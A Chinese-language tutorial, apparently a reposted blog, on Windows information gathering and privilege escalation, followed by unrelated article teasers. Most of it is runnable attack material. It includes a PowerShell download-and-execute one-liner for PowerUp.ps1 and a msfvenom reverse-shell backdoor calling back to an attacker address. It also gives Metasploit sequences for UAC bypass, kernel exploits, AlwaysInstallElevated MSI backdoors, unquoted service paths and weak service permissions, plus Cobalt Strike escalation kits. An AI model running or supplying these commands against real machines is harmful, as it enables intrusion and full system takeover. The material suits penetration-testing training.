windows信息收集和提权

news/2024/9/11 3:52:13/ 标签: windows

目录

手动收集

工具收集 

windows%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%C2%A0-toc" style="margin-left:0px;">windows本地内核提权 

本地提权

windows%E5%8E%BB%E6%89%BE%E9%9C%80%E8%A6%81%E7%9A%84exp%E8%BF%9B%E8%A1%8C%E5%88%A9%E7%94%A8-toc" style="margin-left:80px;">根据windows去找需要的exp进行利用

 提权后结合mimikatz使用

msf提权 

简单提权

生成后门

上线

BypassUAC绕过UAC提权 

msf带的bypassuac模块可以尝试提权

Bypassuac提权命令操作 

 提权成功

​local_exploit_suggester后渗透检测本地漏洞模块

出现绿色的都是可能可以被利用的本地漏洞 

使用一个绿色的模块,成功提权 

windows%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83%E5%B5%8C%E5%A5%97%E5%90%8E%E9%97%A8-toc" style="margin-left:40px;">windows系统服务漏洞

msi提权嵌套后门

判断是否启用此策略设置

以管理员身份手动添加策略营造漏洞

 msi打包安装包工具下载地址

 打包过程详解

运行安装包上线后门

 成功上线(提权成功)

拓展msf的自动打包好直接利用的模块

always_install_elevated模块

命令代码

提权成功 

 可信任服务路径提权

msf的集成的unquoted_service_path集成模块

成功提权 

​ 不安全的服务权限

service_permissions模块

提权成功 

cs提权

先cs上线

提权模块

类比msf

 然后再带*用户进行svc-exe的getsystem提权

 提权成功

获取更多提权脚本

下载地址

上传到cs里 

成功添加模块​


手动收集

获取补丁信息

wmic qfe get Caption,Description,HotFixID,InstalledOn

获取杀软信息

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

获取杀软名和安装目录

WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

工具收集 

两个bat和一个powershell

powershell的执行命令

powershell -ep bypass       #进入powershell环境
Import-Module .\PowerUp.ps1    #导入powershell
Invoke-allchecks               #执行功能

远程加载

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.20.128:8000/PowerUp.ps1'); Invoke-AllChecks"

windows%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%C2%A0" style="background-color:transparent;">windows本地内核提权 

本地提权

windows%E5%8E%BB%E6%89%BE%E9%9C%80%E8%A6%81%E7%9A%84exp%E8%BF%9B%E8%A1%8C%E5%88%A9%E7%94%A8">根据windows去找需要的exp进行利用

GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合icon-default.png?t=N7T8https://github.com/SecWiki/windows-kernel-exploits?tab=readme-ov-file

随便找个对应工具进行的演示

 提权后结合mimikatz使用

msf提权 

简单提权

生成后门

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.128 lport=8888 -f exe -o 8888.exe

上线

getsystem提权失败的不是以管理员身份运行的后门

getsystem提权成功的是以管理员身份运行的后门 

提权原理:实际是命名管道原理,进行模拟令牌进行提权,如果我们dorp_token那么就会回到普通用户

BypassUAC绕过UAC提权 

UAC:用户帐户控制(User Accountcontrol),是windows操作系统中采用的一种控制机制,它以预见的方式阻止不必要的系统范围更改
getsystem提权方式对于普通用户来说是失败的不可正常执行的,那么这种情况下就需要绕过系统UAC来进行getsystem提权

msf带的bypassuac模块可以尝试提权

Bypassuac提权命令操作 

search bypassuac
use exploit/windows/local/bypassuac
set session 1
show targets
set target 1
run

 提权成功

local_exploit_suggester后渗透检测本地漏洞模块

local_exploit_suggester是一个漏洞利用后渗透模块,可用于检査系统中是否存在本地漏洞。它执行本地漏洞利用检查;但不会运行利用任何漏洞,这意味着可以在不进行入侵的情况下扫描系统。不必手动搜索有效的本地漏洞;它将根据系统的平台和体系结构向您显示目标容易受到哪些攻击。
优点:省去手动查找本地漏洞的麻烦,节省时间

缺点:不是所有列出的local exploit都可用 

search local_exploit_suggester
use post/multi/recon/local_exploit_suggester 
options
set session 1
run

出现绿色的都是可能可以被利用的本地漏洞 

使用一个绿色的模块,成功提权 

use exploit/windows/local/ms15_051_client_copy_image
set target 1
set session 1
set payload windows/x64/meterpreter/reverse_tcp
run 

 

windows%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83%E5%B5%8C%E5%A5%97%E5%90%8E%E9%97%A8" style="background-color:transparent;">windows系统服务漏洞

msi提权嵌套后门

参考文章

AlwaysInstallElevated - Win32 apps | Microsoft Learnicon-default.png?t=N7T8https://learn.microsoft.com/zh-cn/windows/win32/msi/alwaysinstallelevated

任意用户以NT AUTHORITY\SYSTEM权限安装MSI安装包。

MSI:Microsoft silent Installer,是微软的安装包格式,它在后台运行.exe安装程序AlwaysInstallElevated是一个策略设置,当在系统中使用WindowsInstaller安装任何程序时,该参数允许非特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以system权限执行任意payload。 

判断是否启用此策略设置
reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

报错则说明未启用,不能进行漏洞的利用提权 

以管理员身份手动添加策略营造漏洞
reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

 msi打包安装包工具下载地址

Free Download - MSI Wrapper Convert EXE to MSI free (exemsi.com)icon-default.png?t=N7T8https://www.exemsi.com/download/

 打包过程详解

MSI打包后门成安装包-CSDN博客打包程序安装到自己电脑上。https://blog.csdn.net/weixin_74171325/article/details/140320559?csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22140320559%22%2C%22source%22%3A%22weixin_74171325%22%7D

生成安装包完成

运行安装包上线后门
msiexec /quiet /qn /i C:\Users\admin\Desktop\8888.msi

 成功上线(提权成功)

拓展msf的自动打包好直接利用的模块
always_install_elevated模块
命令代码
use exploit/windows/local/always_install_elevated
set sessions 1
set payload windows/x64/meterpreter/reverse_tcp
run
提权成功 

 

 可信任服务路径提权

原理:存在缺陷的服务程序利用属于可执行文件的文件/文件夹权限,Windows服务通常都是以System权限运行的,所以系统在解析服务的二进制文件对应的文件路径中的空格的时候也会以系统权限进行解析。如果我们能利用这一特性,就有机会进行权限提升。

C:\Program Files (x86)\Windows Folder\Common Folder\Folder.exe
C:\Program.exe
C:\Program Files (x86)\Windows.exe
C:\Program Files (x86)\Windows Folder\Common.exe
C:\Program Files (x86)\Windows Folder\Common Folder\Folder.exe

对于上面文件路径中的每一个空格,windows都会尝试寻找并执行名字与空格前的名字相匹配的程序操作系统会对文件路径中空格的所有可能进行尝试,直到找到一个匹配的程序。以上面的例子为例,windows会依次尝试确定和执行下面的程序

检查目标主机是否可能存在漏洞
wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v """检测对有漏洞的目录是否有写权限(比如)
icacls "C:\Program Files (x86)\Windows Folder"F =完全控制
CI =容器继承 - 此标志指示从属容器将继承此ACE。
OI = Object Inherit - 这个标志表示从属文件将继承ACE。

 

msf的集成的unquoted_service_path集成模块
use exploit/windows/local/unquoted_service_path
set session 1
set payload windows/x64/meterpreter/reverse_tcp
run
成功提权 

 不安全的服务权限

service_permissions模块
use exploit/windows/local/service_permissions
set sessions 1
set payload windows/x64/meterpreter/reverse_tcp
run
提权成功 

cs提权

先cs上线

 提权模块

 

类比msf

 然后再带*用户进行svc-exe的getsystem提权

 

 提权成功

获取更多提权脚本

下载地址

GitHub - rsmudge/ElevateKit: The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.icon-default.png?t=N7T8https://github.com/rsmudge/ElevateKit

 

 

上传到cs里 

成功添加模块


http://www.ppmy.cn/news/1475395.html

相关文章

Xcode数据分析全解:洞察应用性能的密钥

标题:Xcode数据分析全解:洞察应用性能的密钥 在应用开发和优化的过程中,数据分析是提升用户体验和应用性能的关键步骤。Xcode作为苹果官方的集成开发环境,提供了多种工具和集成方案来支持应用的数据分析。本文将详细介绍如何在Xc…

WordPress主题底部纯文本文章列表

如果是RiPro主题,请在后台顶部设置添加自定义CSS。其他主题在对应的CSS样式添加。 CSS代码: /*底部纯文本文章列表*/ .sjblog-list {height: 90px;background: #333;border-radius: 4px 4px 0 0;padding: 24px;margin: -20px -20px 22px -20px;positio…

守护服务之门:Eureka中分布式认证与授权的实现策略

守护服务之门:Eureka中分布式认证与授权的实现策略 引言 在微服务架构中,服务间的通信安全至关重要。Eureka作为Netflix开源的服务发现框架,虽然本身提供了服务注册与发现的功能,但并不直接提供认证与授权机制。为了实现服务的分…

Java面试八股之Redis单线程为什么性能高

Redis单线程为什么性能高 1.内存数据库特性 要点:Redis是一个内存数据库,其数据主要存储在内存中,而非磁盘。内存访问的速度远超磁盘,通常可达纳秒级别,这使得Redis在处理数据时几乎不受I/O瓶颈的影响。由于数据操作…

LeetCode(2)-反转链表、删除链表中等于val的节点、返回链表中的中间节点

一、反转链表 . - 力扣(LeetCode) 解法1: /*** Definition for singly-linked list.* struct ListNode {* int val;* struct ListNode *next;* };*/ typedef struct ListNode ListNode; struct ListNode* reverseList(struct ListN…

“论基于构件的软件开发方法及其应用”精选范文,软考高级论文,系统架构设计师论文

论文真题 基于构作的软件开发 (Component-Based Software Development,CBSD) 是一种基于分布对象技术、强调通过可复用构件设计与构造软件系统的软件复用途径。基于构件的软件系统中的构件可以是COTS (Commercial-Off-the-Shelf)构件&#x…

C#winfrom窗体开发图书管理系统

一、图书管理系统设计背景 图书馆管理系统是一个关键的信息技术应用,旨在提升图书馆的运营效率和用户的借阅体验。该系统通过数字化手段,实现了图书资源的高效管理和用户服务的便捷化。随着数字化时代的到来,传统的图书馆管理方式已经不能满…

Java实现将图片转换成PDF

1.引入依赖 <dependency><groupId>org.apache.pdfbox</groupId><artifactId>pdfbox</artifactId><version>2.0.24</version> </dependency>2.工具方法 package com.prescription.transfer.system.utils;import org.apache.p…

flutter 列表下拉框加搜索

1.使用控件搜索加下拉框dropdown_search: ^0.4.9和获取中文拼音lpinyin: ^1.1.1 2.加入中文查询和首字查询 在当中找到相应的packages&#xff0c;再在SelectDialog.dart当中加入引入拼音搜索 import package:lpinyin/lpinyin.dart; 更改匹配方法manageItemsByFilter使其可…

R包: phyloseq扩增子统计分析利器

介绍 phyloseq包对多类型数据的综合软件&#xff0c;并其对这些数据提供统计分析和可视化方法。 微生物数据分析的主要挑战之一是如何整合不同类型的数据&#xff0c;从而对其进行生态学、遗传学、系统发育学、多元统计、可视化和检验等分析。同时&#xff0c;由于同行之间需要…

期货量化交易客户端开源教学第九节——新用户注册

一、新用户注册界面设计&#xff1a; 注册时采用手机号注册&#xff0c;客户端发送新号注册申请由后台做审核&#xff0c;后台审核通过后向注册的手机号发送注册成功的消息。注册过的手机号不能再二次注册。 界面验证代码 private{ Private declarations }FVerf: AnsiString; …

【QT】布局管理器

布局管理器 布局管理器1. 垂直布局2. 水平布局3. 网格布局4. 表单布局5. Spacer 布局管理器 之前使⽤ Qt 在界⾯上创建的控件, 都是通过 “绝对定位” 的⽅式来设定的&#xff1b;也就是每个控件所在的位置, 都需要计算坐标, 最终通过 setGeometry 或者 move ⽅式摆放过去。 …

java 前端上传文件后端解析并转发到第三方存储,Hutool 工具

单个文件上传 PostMapping("/upload")public MyResponse<?> upload(MultipartFile file) {if (multipartFiles null || multipartFiles.length 0) {throw new MessageException("未选择文件");}InputStreamResource inputStreamResource new Inp…

实用教程:用 Go 的 net/textproto 包优化文本协议处理

实用教程&#xff1a;用 Go 的 net/textproto 包优化文本协议处理 介绍准备工作环境设置Go 基础回顾 基础使用创建连接发送请求接收响应 高级特性处理 MIME 头多行响应的管理错误处理与调试 实战案例实现一个简单的邮件客户端实现一个基于 net/textproto 的命令行工具 最佳实践…

从零开始开发视频美颜SDK:实现直播美颜效果

因此&#xff0c;开发一款从零开始的视频美颜SDK&#xff0c;不仅可以节省成本&#xff0c;还能根据具体需求进行个性化调整。本文将介绍从零开始开发视频美颜SDK的关键步骤和实现思路。 一、需求分析与技术选型 在开发一款视频美颜SDK之前&#xff0c;首先需要进行详细的需求…

WPF界面设计-更改按钮样式 自定义字体图标

一、下载图标文件 iconfont-阿里巴巴矢量图标库 二、xaml界面代码编辑 文件结构 &#xe653; 对应的图标代码 Fonts/#iconfont 对应文件位置 <Window.Resources><ControlTemplate TargetType"Button" x:Key"CloseButtonTemplate"…

数据结构与算法基础-学习-37-平衡二叉树(Avl树)之删除节点

目录 一、知识点回顾 1、二叉搜索树&#xff08;BST&#xff09; 2、平衡二叉树&#xff08;Avl树&#xff09;之查找 二、环境信息 三、实现思路 1、示例图 2、查询 3、删除 &#xff08;1&#xff09;叶子节点&#xff08;无子树节点&#xff09; &#xff08;2&am…

如何为IP申请SSL证书

目录 以下是如何轻松为IP地址申请SSL证书的详细步骤&#xff1a; 申请IP证书的基本条件&#xff1a; 申请IP SSL证书的方式&#xff1a; 确保网络通信安全的核心要素之一&#xff0c;是有效利用SSL证书来加密数据传输&#xff0c;特别是对于那些直接通过IP地址访问的资源。I…

同步的艺术:Conda包依赖的自动同步策略

同步的艺术&#xff1a;Conda包依赖的自动同步策略 引言 在复杂的软件开发项目中&#xff0c;依赖管理是确保项目顺利进行的关键环节。Conda作为Python和其他科学计算语言的强大包管理器&#xff0c;提供了依赖同步功能&#xff0c;帮助用户自动化和简化依赖项的同步过程。本…

Oracle数据文件扩容

1、增加数据文件扩容 ALTER TABLESPACE app_data ADD DATAFILE D:\ORACLE\PRODUCT\10.2.0\ORADATA\EDWTEST\APP04.DBF SIZE 30G AUTOEXTEND ON NEXT 1G MAXSIZE UNLIMITED; ALTER database datafile /ora/oradata/radius/undo.dbf resize 32G; alter tablespace sysaux add …